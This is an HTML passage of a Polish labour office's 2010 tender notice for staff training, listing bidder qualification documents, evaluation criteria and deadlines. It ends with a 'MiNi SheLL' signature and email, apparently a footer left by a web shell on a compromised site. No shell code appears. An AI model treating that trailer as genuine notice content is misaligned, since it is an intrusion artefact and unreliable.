2) posiada co najmniej trzyletnie doświadczenie praktyczne z tematyki odpowiadającej przedmiotowi zamówienia opisanemu w Rozdziale II ust. 1 SIWZ - przedmiotową informację należy zamieścić w pozycji Wykazu osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącego załącznik nr 7 do SIWZ dotyczącej doświadczenia niezbędnego do wykonania zamówienia, z zastrzeżeniem, że w celu potwierdzenia znajomości tematyki merytorycznej przedmiotowego szkolenia do Wykazu osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącego załącznik nr 7 do SIWZ należy dołączyć dokumenty potwierdzające kwalifikacje i doświadczenie zawodowe wykazanych w nim osób, na które składają się: CV, kserokopie dyplomów, świadectw, zaświadczeń, certyfikatów i innych dokumentów potwierdzających kwalifikacje zawodowe i doświadczenie zawodowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku znajdowania się 
w odpowiedniej sytuacji ekonomicznej i finansowej, jeżeli ten oświadczy, że znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, składając oświadczenie wg wzoru stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Wypełniony formularz oferty wg wzoru na zał. nr 1 do SIWZ.
2) Wypełniony program szkolenia wg wzoru na zał. nr 8 do SIWZ. Należy wypełnić dwa odrębne programy szkolenia, to jest odrębny program szkolenia dotyczący szkolenia na temat Techniki redukcji stresu (moduł miękki) oraz odrębny program szkolenia dotyczący szkolenia na temat Kodeks pracy ze szczególnym uwzględnieniem zagadnień dotyczących dyskryminacji i nierówności płci na rynku pracy (moduł merytoryczny).
3) Wzór dokumentu potwierdzającego ukończenie szkolenia</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie Wykonawcy w realizacji przedmiotowego szkolenia - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.bedzin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Będzinie, ul. 1-go Maja 2, 42-500 Będzin, pokój nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2010 godzina 12:00, miejsce: Powiatowy Urząd Pracy w Będzinie, ul. 1-go Maja 2, 42-500 Będzin, pokój nr 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu pn. Inwestycja w kadrę 2010 - 2011 współfinansowanego
ze środków Europejskiego Funduszu Społecznego w ramach Działania 6.1 Poprawa dostępu do zatrudnienia 
oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com